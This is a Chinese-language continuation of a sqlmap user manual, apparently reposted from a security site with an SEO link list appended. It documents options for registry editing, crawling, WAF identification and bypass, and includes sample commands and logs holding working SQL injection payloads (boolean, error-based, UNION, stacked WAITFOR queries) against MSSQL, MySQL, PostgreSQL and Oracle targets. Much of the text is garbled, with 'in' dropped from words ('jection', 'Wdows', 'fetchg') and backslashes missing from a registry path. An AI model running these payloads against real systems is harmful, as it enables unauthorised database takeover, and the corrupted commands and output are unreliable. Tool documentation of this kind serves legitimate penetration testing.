sqlmap用户手册[续篇]
ps其实看到zone里很多问sqlmap的问题在通读看完那篇文章后都能解决。可惜啊,现在的人通读看文章的耐心都没有了,遇到了哪个问题就想起针对这个问题求助,却不知道仔细看完之后,以后可以省多少时间来求助,吐槽完毕,正文开始
对Wdows注册表操作
当数据库为MySQL,PostgreSQL或Microsoft SQL Server,并且当前web应用支持堆查询。 ,当前连接数据库的用户也需要有权限操作注册表。
读取注册表值
参数-reg-read
写入注册表值
参数-reg-add
删除注册表值
参数-reg-del
注册表辅助选项
参数-reg-key,-reg-value,-reg-data,-reg-type
需要配合之前三个参数使用,例子
$ python sqlmap.py -u --reg-add --reg-key="HKEY_LOCAL_MACHINESOFTWAREsqlmap" --reg-value=Test --reg-type=REG_SZ --reg-data=1
常规参数
从sqlite中读取session
参数-s
sqlmap对每一个目标都会在output路径下自动生成一个SQLite文件,如果用户想指定读取的文件路径,就可以用这个参数。
保存HTTP(S)日志
参数-t
这个参数需要跟一个文本文件,sqlmap会把HTTP(S)请求与响应的日志保存到那里。
非交互模式
参数-batch
用此参数,不需要用户输入,将会使用sqlmap提示的默认值一直运行下去。
强制使用字符编码
参数-charset
不使用sqlmap自动识别的(如HTTP头中的Content-Type)字符编码,强制指定字符编码如
--charset=GBK
爬行网站URL
参数-crawl
sqlmap可以收集潜在的可能存在漏洞的连接,后面跟的参数是爬行的深度。
例子
$ python sqlmap.py -u "" --batch --crawl=3
[...]
[xx:xx:53] [INFO] startg crawler
[xx:xx:53] [INFO] searchg for lks with depth 1
[xx:xx:53] [WARNING] runng a sgle-thread mode. This could take a while
[xx:xx:53] [INFO] searchg for lks with depth 2
[xx:xx:54] [INFO] heuristics detected web page charset 'ascii'
[xx:xx:00] [INFO] 42/56 lks visited (75%)
[...]
规定输出到CSV中的分隔符
参数-csv-del
当dump保存为CSV格式时(-dump-format=CSV),需要一个分隔符默认是逗号,用户也可以改为别的 如
--csv-del=";"
DBMS身份验证
参数-dbms-cred
某些时候当前用户的权限不够,做某些操作会失败,如果知道高权限用户的密码,可以使用此参数,有的数据库有专门的运行机制,可以切换用户如Microsoft SQL Server的OPENROWSET函数
定义dump数据的格式
参数-dump-format
输出的格式可定义为CSV,HTML,SQLITE
预估完成时间
参数-eta
可以计算注入数据的剩余时间。
例如Oracle的布尔型盲注
$ python sqlmap.py -u "" -b --eta
[...]
[hh:mm:01] [INFO] the back-end DBMS is Oracle
[hh:mm:01] [INFO] fetchg banner
[hh:mm:01] [INFO] retrievg the length of query output
[hh:mm:01] [INFO] retrieved: 64
17% [========> ] 11/64 ETA 00:19
然后
100% [===================================================] 64/64
[hh:mm:53] [INFO] retrieved: Oracle Database 10g Enterprise Edition Release 10.2.0.1.0 - Prod
web application technology: PHP 5.2.6, Apache 2.2.9
back-end DBMS: Oracle
banner: 'Oracle Database 10g Enterprise Edition Release 10.2.0.1.0 - Prod'
sqlmap先输出长度,预计完成时间,显示百分比,输出字符
刷新session文件
参数-flush-session
如果不想用之前缓存这个目标的session文件,可以使用这个参数。 会清空之前的session,重新测试该目标。
自动获取form表单测试
参数-forms
如果你想对一个页面的form表单中的参数测试,可以使用-r参数读取请求文件,或者通过-data参数测试。 当使用-forms参数时,sqlmap会自动从-u中的url获取页面中的表单进行测试。
忽略在会话文件中存储的查询结果
参数-fresh-queries
忽略session文件保存的查询,重新查询。
使用DBMS的hex函数
参数-hex
有时候字符编码的问题,可能导致数据丢失,可以使用hex函数来避免
针对PostgreSQL例子
$ python sqlmap.py -u "" --banner --hex -v 3 --parse-errors
[...]
[xx:xx:14] [INFO] fetchg banner
[xx:xx:14] [PAYLOAD] 1 AND 5849=CAST((CHR(58)||CHR(118)||CHR(116)||CHR(106)||CHR(58))||(ENCODE(CONVERT_TO((COALESCE(CAST(VERSION() AS CHARACTER(10000)),(CHR(32)))),(CHR(85)||CHR(84)||CHR(70)||CHR(56))),(CHR(72)||CHR(69)||CHR(88))))::text||(CHR(58)||CHR(110)||CHR(120)||CHR(98)||CHR(58)) AS NUMERIC)
[xx:xx:15] [INFO] parsed error message: 'pg_query() [<a href='function.pg-query'>function.pg-query</a>]: Query failed: ERROR: valid put syntax for type numeric: ":vtj:506f737467726553514c20382e332e39206f6e20693438362d70632d6c696e75782d676e752c20636f6d70696c656420627920474343206763632d342e332e7265616c202844656269616e2032e332e322d312e312920342e332e32:nxb:" <b>/var//sqlmap/libs/pgsql.c.php</b> on le <b>35</b>'
[xx:xx:15] [INFO] retrieved: PostgreSQL 8.3.9 on i486-pc-lux-gnu, piled by
GCC g-4.3.real (Debian 4.3.2-1.1) 4.3.2
[...]
自定义输出的路径
参数-output-dir
sqlmap默认把session文件跟结果文件保存在output文件夹下,用此参数可自定义输出路径 例如-output-dir=/tmp
从响应中获取DBMS的错误信息
参数-parse-errors
有时目标没有关闭DBMS的报错,当数据库语句错误时,会输出错误语句,用词参数可以会显出错误信息。
$ python sqlmap.py -u "" --parse-errors
[...]
[11:12:17] [INFO] ORDER BY technique seems to be usable. This should reduce the time needed to fd the right number of query columns. Automatically extendg the range for current UNION query jection technique test
[11:12:17] [INFO] parsed error message: 'Microsoft OLE DB Provider for ODBC Drivers (0x80040E14)
[Microsoft][ODBC SQL Server Driver][SQL Server]The ORDER BY position number 10 is out of range of the number of items the select list.
<b>/sqlmap/mssql/iis/get_t.asp, le 27</b>'
[11:12:17] [INFO] parsed error message: 'Microsoft OLE DB Provider for ODBC Drivers (0x80040E14)
[Microsoft][ODBC SQL Server Driver][SQL Server]The ORDER BY position number 6 is out of range of the number of items the select list.
<b>/sqlmap/mssql/iis/get_t.asp, le 27</b>'
[11:12:17] [INFO] parsed error message: 'Microsoft OLE DB Provider for ODBC Drivers (0x80040E14)
[Microsoft][ODBC SQL Server Driver][SQL Server]The ORDER BY position number 4 is out of range of the number of items the select list.
<b>/sqlmap/mssql/iis/get_t.asp, le 27</b>'
[11:12:17] [INFO] target URL appears to have 3 columns query
[...]
其他的一些参数
使用参数缩写
参数-z
有使用参数太长太复杂,可以使用缩写模式。 例如
python sqlmap.py --batch --random-agent --ignore-proxy --technique=BEU -u ""
可以写成
python sqlmap.py -z "bat,randoma,ign,tec=BEU" -u ""
还有
python sqlmap.py --ignore-proxy --flush-session --technique=U --dump -D testdb -T users -u ""
可以写成
python sqlmap.py -z "ign,flu,bat,tec=U,dump,D=testdb,T=users" -u ""
成功SQL注入时警告
参数-alert
设定会发的答案
参数-answers
当希望sqlmap提出输入时,自动输入自己想要的答案可以使用此参数 例子
$ python sqlmap.py -u " --answers="extendg=N" --batch
[...]
[xx:xx:56] [INFO] testg for SQL jection on GET parameter 'id'
heuristic (parsg) test showed that the back-end DBMS could be 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] Y
[xx:xx:56] [INFO] do you want to clude all tests for 'MySQL' extendg provided level (1) and risk (1)? [Y/n] N
[...]
发现SQL注入时发出蜂鸣声
参数-beep
发现sql注入时,发出蜂鸣声。
启发式检测WAF/IPS/IDS保护
参数-check-waf
WAF/IPS/IDS保护可能会对sqlmap造成很大的困扰,如果怀疑目标有此防护的话,可以使用此参数来测试。 sqlmap将会使用一个不存在的参数来注入测试
例如
&foobar=AND 1=1 UNION ALL SELECT 1,2,3,table_name FROM formation_schema.tables WHERE 2>1
如果有保护的话可能返回结果会不同。
清理sqlmap的UDF(s)和表
参数-cleanup
清除sqlmap注入时产生的udf与表。
禁用彩色输出
参数-desable-colorg
sqlmap默认彩色输出,可以使用此参数,禁掉彩色输出。
使用指定的Google结果页面
参数-gpage
默认sqlmap使用前100个URL地址作为注入测试,结合此选项,可以指定页面的URL测试。
使用HTTP参数污染
参数-hpp
HTTP参数污染可能会绕过WAF/IPS/IDS保护机制,这个对ASP/IIS与ASP.NET/IIS平台很有效。
测试WAF/IPS/IDS保护
参数-identify-waf
sqlmap可以尝试找出WAF/IPS/IDS保护,方便用户做出绕过方式。目前大约支持30种产品的识别。
例如对一个受到ModSecurity WAF保护的MySQL例子
$ python sqlmap.py -u "" --identify-waf -v 3
[...]
[xx:xx:23] [INFO] testg connection to the target URL
[xx:xx:23] [INFO] heuristics detected web page charset 'ascii'
[xx:xx:23] [INFO] usg WAF scripts to detect backend WAF/IPS/IDS protection
[xx:xx:23] [DEBUG] checkg for WAF/IDS/IPS product 'USP Secure Entry Server (United Security Providers)'
[xx:xx:23] [DEBUG] checkg for WAF/IDS/IPS product 'BarySEC Web Application Firewall (BarySEC)'
[xx:xx:23] [DEBUG] checkg for WAF/IDS/IPS product 'NetContuum Web Application Firewall (NetContuum/Barracuda Networks)'
[xx:xx:23] [DEBUG] checkg for WAF/IDS/IPS product 'Hyperguard Web Application Firewall (art of defence Inc.)'
[xx:xx:23] [DEBUG] checkg for WAF/IDS/IPS product 'Cisco ACE XML Gateway (Cisco Systems)'
[xx:xx:23] [DEBUG] checkg for WAF/IDS/IPS product 'TrafficShield (F5 Networks)'
[xx:xx:23] [DEBUG] checkg for WAF/IDS/IPS product 'Teros/Citrix Application Firewall Enterprise (Teros/Citrix Systems)'
[xx:xx:23] [DEBUG] checkg for WAF/IDS/IPS product 'KONA Security Solutions (Akamai Technologies)'
[xx:xx:23] [DEBUG] checkg for WAF/IDS/IPS product 'Incapsula Web Application Firewall (Incapsula/Imperva)'
[xx:xx:23] [DEBUG] checkg for WAF/IDS/IPS product 'CloudFlare Web Application Firewall (CloudFlare)'
[xx:xx:23] [DEBUG] checkg for WAF/IDS/IPS product 'Barracuda Web Application Firewall (Barracuda Networks)'
[xx:xx:23] [DEBUG] checkg for WAF/IDS/IPS product 'webApp.secure (webScurity)'
[xx:xx:23] [DEBUG] checkg for WAF/IDS/IPS product 'Proventia Web Application Security (IBM)'
[xx:xx:23] [DEBUG] declared web page charset 'iso-8859-1'
[xx:xx:23] [DEBUG] page not found (404)
[xx:xx:23] [DEBUG] checkg for WAF/IDS/IPS product 'KS-WAF (Knownsec)'
[xx:xx:23] [DEBUG] checkg for WAF/IDS/IPS product 'NetScaler (Citrix Systems)'
[xx:xx:23] [DEBUG] checkg for WAF/IDS/IPS product 'Jiasule Web Application Firewall (Jiasule)'
[xx:xx:23] [DEBUG] checkg for WAF/IDS/IPS product 'WebKnight Application Firewall (AQTRONIX)'
[xx:xx:23] [DEBUG] checkg for WAF/IDS/IPS product 'AppWall (Radware)'
[xx:xx:23] [DEBUG] checkg for WAF/IDS/IPS product 'ModSecurity: Open Source Web Application Firewall (Trustwave)'
[xx:xx:23] [CRITICAL] WAF/IDS/IPS identified 'ModSecurity: Open Source Web Application Firewall (Trustwave)'. Please consider usage of tamper scripts (option '--tamper')
[...]
模仿智能手机
参数-mobile
有时服务端只接收移动端的访问,此时可以设定一个手机的User-Agent来模仿手机登陆。
例如
$ python sqlmap.py -u "" --mobile
[...]
which smartphone do you want sqlmap to imitate through HTTP User-Agent header?
[1] Apple iPhone 4s (default)
[2] BlackBerry 9900
[3] Google Nexus 7
[4] HP iPAQ 6365
[5] HTC Sensation
[6] Nokia N97
[7] Samsung Galaxy S
> 1
[...]
安全的删除output目录的文件
参数-purge-output
有时需要删除结果文件,而不被恢复,可以使用此参数,原有文件将会被随机的一些文件覆盖。
例如
$ python sqlmap.py --purge-output -v 3
[...]
[xx:xx:55] [INFO] purgg content of directory '/home/user/sqlmap/output'...
[xx:xx:55] [DEBUG] changg file attributes
[xx:xx:55] [DEBUG] writg random data to files
[xx:xx:55] [DEBUG] truncatg files
[xx:xx:55] [DEBUG] renamg filenames to random values
[xx:xx:55] [DEBUG] renamg directory names to random values
[xx:xx:55] [DEBUG] deletg the whole directory tree
[...]
启发式判断注入
参数-smart
有时对目标非常多的URL进行测试,为节省时间,只对能够快速判断为注入的报错点进行注入,可以使用此参数。
例子
$ python sqlmap.py -u "" --batch --smart
[...]
[xx:xx:14] [INFO] testg if GET parameter 'ca' is dynamic
[xx:xx:14] [WARNING] GET parameter 'ca' does not appear dynamic
[xx:xx:14] [WARNING] heuristic (basic) test shows that GET parameter 'ca' might not be jectable
[xx:xx:14] [INFO] skippg GET parameter 'ca'
[xx:xx:14] [INFO] testg if GET parameter 'user' is dynamic
[xx:xx:14] [WARNING] GET parameter 'user' does not appear dynamic
[xx:xx:14] [WARNING] heuristic (basic) test shows that GET parameter 'user' might not be jectable
[xx:xx:14] [INFO] skippg GET parameter 'user'
[xx:xx:14] [INFO] testg if GET parameter 'id' is dynamic
[xx:xx:14] [INFO] confirmg that GET parameter 'id' is dynamic
[xx:xx:14] [INFO] GET parameter 'id' is dynamic
[xx:xx:14] [WARNING] reflective value(s) found and filterg out
[xx:xx:14] [INFO] heuristic (basic) test shows that GET parameter 'id' might be jectable (possible DBMS: 'MySQL')
[xx:xx:14] [INFO] testg for SQL jection on GET parameter 'id'
heuristic (parsg) test showed that the back-end DBMS could be 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] Y
do you want to clude all tests for 'MySQL' extendg provided level (1) and risk (1)? [Y/n] Y
[xx:xx:14] [INFO] testg 'AND boolean-based bld - WHERE or HAVING clause'
[xx:xx:14] [INFO] GET parameter 'id' is 'AND boolean-based bld - WHERE or HAVING clause' jectable
[xx:xx:14] [INFO] testg 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause'
[xx:xx:14] [INFO] GET parameter 'id' is 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause' jectable
[xx:xx:14] [INFO] testg 'MySQL le queries'
[xx:xx:14] [INFO] testg 'MySQL > 5.0.11 stacked queries'
[xx:xx:14] [INFO] testg 'MySQL < 5.0.12 stacked queries (heavy query)'
[xx:xx:14] [INFO] testg 'MySQL > 5.0.11 AND time-based bld'
[xx:xx:24] [INFO] GET parameter 'id' is 'MySQL > 5.0.11 AND time-based bld' jectable
[xx:xx:24] [INFO] testg 'MySQL UNION query (NULL) - 1 to 20 columns'
[xx:xx:24] [INFO] automatically extendg ranges for UNION query jection technique tests as there is at least one other potential jection technique found
[xx:xx:24] [INFO] ORDER BY technique seems to be usable. This should reduce the time needed to fd the right number of query columns. Automatically extendg the range for current UNION query jection technique test
[xx:xx:24] [INFO] target URL appears to have 3 columns query
[xx:xx:24] [INFO] GET parameter 'id' is 'MySQL UNION query (NULL) - 1 to 20 columns' jectable
[...]
初级用户向导参数
参数-wizard 面向初级用户的参数,可以一步一步教你如何输入针对目标注入。
$ python sqlmap.py --wizard
sqlmap/1.0-dev-2defc30 - automatic SQL jection and database takeover tool
[!] legal disclaimer: Usage of sqlmap for attackg targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[] startg at 11:25:26
Please enter full target URL (-u):
POST data (--data) [Enter for None]:
Injection difficulty (--level/--risk). Please choose:
[1] Normal (default)
[2] Medium
[3] Hard
> 1
Enumeration (--banner/--current-user/etc). Please choose:
[1] Basic (default)
[2] Smart
[3] All
> 1
sqlmap is runng, please wait..
heuristic (parsg) test showed that the back-end DBMS could be 'Microsoft SQL Server'. Do you want to skip test payloads specific for other DBMSes? [Y/n] Y
do you want to clude all tests for 'Microsoft SQL Server' extendg provided level (1) and risk (1)? [Y/n] Y
GET parameter 'id' is vulnerable. Do you want to keep testg the others (if any)? [y/N] N
sqlmap identified the followg jection pots with a total of 25 HTTP(s) requests:
---
Place: GET
Parameter: id
Type: boolean-based bld
Title: AND boolean-based bld - WHERE or HAVING clause
Payload: id=1 AND 2986=2986
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: id=1 AND 4847=CONVERT(INT,(CHAR(58) CHAR(118) CHAR(114) CHAR(100) CHAR(58) (SELECT (CASE WHEN (4847=4847) THEN CHAR(49) ELSE CHAR(48) END)) CHAR(58) CHAR(111) CHAR(109) CHAR(113) CHAR(58)))
Type: UNION query
Title: Generic UNION query (NULL) - 3 columns
Payload: id=1 UNION ALL SELECT NULL,NULL,CHAR(58) CHAR(118) CHAR(114) CHAR(100) CHAR(58) CHAR(70) CHAR(79) CHAR(118) CHAR(106) CHAR(87) CHAR(101) CHAR(119) CHAR(115) CHAR(114) CHAR(77) CHAR(58) CHAR(111) CHAR(109) CHAR(113) CHAR(58)--
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries
Payload: id=1; WAITFOR DELAY '0:0:5'--
Type: AND/OR time-based bld
Title: Microsoft SQL Server/Sybase time-based bld
Payload: id=1 WAITFOR DELAY '0:0:5'--
Type: le query
Title: Microsoft SQL Server/Sybase le queries
Payload: id=(SELECT CHAR(58) CHAR(118) CHAR(114) CHAR(100) CHAR(58) (SELECT (CASE WHEN (6382=6382) THEN CHAR(49) ELSE CHAR(48) END)) CHAR(58) CHAR(111) CHAR(109) CHAR(113) CHAR(58))
---
web server operatg system: Wdows XP
web application technology: ASP, Microsoft IIS 5.1
back-end DBMS operatg system: Wdows XP Service Pack 2
back-end DBMS: Microsoft SQL Server 2005
banner:
---
Microsoft SQL Server 2005 - 9.00.1399.06 (Intel X86)
Oct 14 2005 00:33:37
Copyright (c) 1988-2005 Microsoft Corporation
Express Edition on Wdows NT 5.1 (Build 2600: Service Pack 2)
---
current user: 'sa'
current database: 'testdb'
current user is DBA: True
[] shuttg down at 11:25:52
lk:http://drops.wooyun./tips/401
网站设计
- 静宁会SEO的网站建设公司:全面提升您的网络影
- 提升在线业务的关键:选择最佳的丽水网站建设
- 浙江网站优化发展潜力如何
- 井研专业的网站建设公司:打造您的在线品牌
- 灵山SEO网站建设公司:提升您的在线业务表现
- 蒙城网站建设优化公司:提升您网站表现的理想
- 阳谷企业网站优化:提升线上业务力的关键
- 樟树专业的网站建设公司:打造您在线业务的坚
- 通河百度SEO排名的策略与技巧
- 重庆百度快照排名如何进行精准的客户引流
- 重庆百度快照排名
- 常宁便宜的建站公司:助您轻松打造在线业务
- 巫溪百度网站优化:提升网站曝光率与流量的关
- 湖北整站优化怎么做才能放大客户需求
- 闸北网站建设多少钱?全面解析与预算规划
- 辽宁企业网站优化怎么做电话营销